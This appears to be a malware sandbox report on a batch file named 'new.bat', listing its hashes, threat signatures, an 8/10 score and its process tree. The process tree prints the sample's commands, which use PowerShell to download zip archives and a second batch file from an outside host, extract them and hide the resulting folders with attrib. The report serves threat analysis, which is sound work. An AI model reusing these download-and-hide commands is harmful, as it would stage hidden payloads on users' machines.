Overview

overview

10

Static

static

1

new.bat

windows7-x64

8

new.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    359s
  • max time network
    365s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-10-2024 19:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    new.bat

  • Size

    13.0MB

  • MD5

    fa7d31fe5607567d7240f15f27a7fd08

  • SHA1

    192e1240b664bdee1ac923c12af86d0552bd9774

  • SHA256

    830b295a70e3db6aa9e9c343bc76b59015cf1e88124efaae9713d726b6381cd2

  • SHA512

    e57ce88a41c1014189b4b4ebeda0f660cb23251fda834de5be591859b5769b6fb0b368be5634072f8083add8401abec4d92beb668263b7458571b70f94b7f4fd

  • SSDEEP

    96:q8kfEa9L03YTZEc/LsZHbwWzDI469xmnZuw1OnfnMn3BonlMS/yN+6uVF/xx6t8W:gfEa5TT0tZ8EriC

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9396/DX1.zip' -OutFile 'C:\Users\Admin\Downloads\DX1.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DX1.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2844
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9396/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9396/F7BS.zip' -OutFile 'C:\Users\Admin\Downloads\F7BS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\F7BS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:2576

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    4c1f63bbc73a9ed7533d7c60ab6fb1aa

    SHA1

    6b0380c9161d46700cc5cf719c409a9e1192ea43

    SHA256

    a1be64ff27ce07945eef6d67eee4f2e0593d406f5dfe4e411d08d9045d11d2ae

    SHA512

    69c1c77458c5c062abba81c958ac70f7013258c83ba06a01743a56e0da797ac8f63443aa8a2fc8fb1fbf82fce833480917bbce633d34c1f158eb40240771ef0b

    Download Submit

  • memory/2360-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2360-5-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2360-6-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2360-7-0x000000001B2B0000-0x000000001B592000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2360-8-0x0000000002460000-0x0000000002468000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2360-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2360-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2360-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2724-17-0x00000000023B0000-0x0000000002430000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2724-19-0x00000000023A0000-0x00000000023A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2724-18-0x000000001B180000-0x000000001B462000-memory.dmp

    Filesize

    2.9MB

    Download